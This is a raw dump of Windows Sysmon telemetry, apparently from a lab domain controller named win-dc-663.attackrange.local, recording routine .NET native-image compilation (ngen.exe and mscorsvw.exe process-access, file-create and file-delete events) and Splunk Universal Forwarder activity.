21:01:19.763{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11F-60D3-8E02-00000000CF01}1268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018989Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.748{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11F-60D3-8E02-00000000CF01}1268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018988Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.748{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11F-60D3-8E02-00000000CF01}1268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018987Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.685{4DB9351A-A11F-60D3-8D02-00000000CF01}7108NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RCGOPZ2UF0\System.Security.ni.dll.auxMD5=7C2D1E993C4D34C13A652BAAB81CFCA0,SHA256=C6706940A2E53CFBEEDCF292BD421E97F2337143BB54A87183CD10A21DA869F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018986Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.685{4DB9351A-A11F-60D3-8D02-00000000CF01}7108NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RCGOPZ2UF0\System.Security.ni.dllMD5=4844641A15F302B35F8081D78C27A951,SHA256=BC1E5C710E4E2C689E9BFB424C0AB85224A3145230E54BBBC8A91559640BA350,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018985Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:19.670{4DB9351A-A11F-60D3-8D02-00000000CF01}7108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1bc4-0\System.Security.dll2021-06-23 21:01:19.670 23542300x800000000000000018984Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.123{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=434F3EF6B193B8AE99ED86B746F8349C,SHA256=69D3AE5220DD3F1DD54A6C77C637FB8B604A4BBA57EEBBB1BFF7C2C3BBD63B87,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018983Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11F-60D3-8D02-00000000CF01}7108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018982Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.076{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11F-60D3-8D02-00000000CF01}7108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018981Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.076{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11F-60D3-8D02-00000000CF01}7108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018980Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.029{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11F-60D3-8C02-00000000CF01}6412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018979Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.013{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11F-60D3-8C02-00000000CF01}6412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018978Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.013{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11F-60D3-8C02-00000000CF01}6412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019005Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.857{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A120-60D3-9102-00000000CF01}5720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019004Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.842{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A120-60D3-9102-00000000CF01}5720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019003Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.842{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A120-60D3-9102-00000000CF01}5720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019002Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A120-60D3-9002-00000000CF01}6744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.748{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A120-60D3-9002-00000000CF01}6744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019000Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.748{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A120-60D3-9002-00000000CF01}6744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.685{4DB9351A-A120-60D3-8F02-00000000CF01}7120NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RKOWJUDZ0G\System.ServiceModel.Activation.ni.dll.auxMD5=EF191DB9F47755D77A9F1708A8128A2B,SHA256=B7AADD292E0F22889CD7BABB11B84A6AC7AC615EBA615D39A7221D0313DE90C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018998Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.685{4DB9351A-A120-60D3-8F02-00000000CF01}7120NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RKOWJUDZ0G\System.ServiceModel.Activation.ni.dllMD5=306B2DCDC0C5280863865518E935B0E2,SHA256=BBC6BBCCA350173D6B5E27C3688D33656A65D1253551A9EA801B27FB277A16B8,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018997Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:20.654{4DB9351A-A120-60D3-8F02-00000000CF01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1bd0-0\System.ServiceModel.Activation.dll2021-06-23 21:01:20.654 354300x800000000000000018996Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.207{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61369-false10.0.1.12-8000- 10341000x800000000000000018995Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.013{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A120-60D3-8F02-00000000CF01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018994Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.013{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A120-60D3-8F02-00000000CF01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018993Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.013{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A120-60D3-8F02-00000000CF01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:21.045{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8DE28A2619B24D19CA6CDBA02173FB8E,SHA256=9388D4454883862FCB06D0591FDBC86AC0E2DA6141133D56C0800BCA92FDE948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:21.013{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52E9EA65DC4DCD1A415EEB67E57256A7,SHA256=C821A1814E46686C80CBCF0BA6B514A98FE98AEB4539E7752C80422B5F0BD30E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:22.951{4DB9351A-A122-60D3-9302-00000000CF01}7100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1bbc-0\System.ServiceModel.Channels.dll2021-06-23 21:01:22.951 10341000x800000000000000019017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.607{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A122-60D3-9302-00000000CF01}7100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.592{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A122-60D3-9302-00000000CF01}7100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.592{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A122-60D3-9302-00000000CF01}7100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 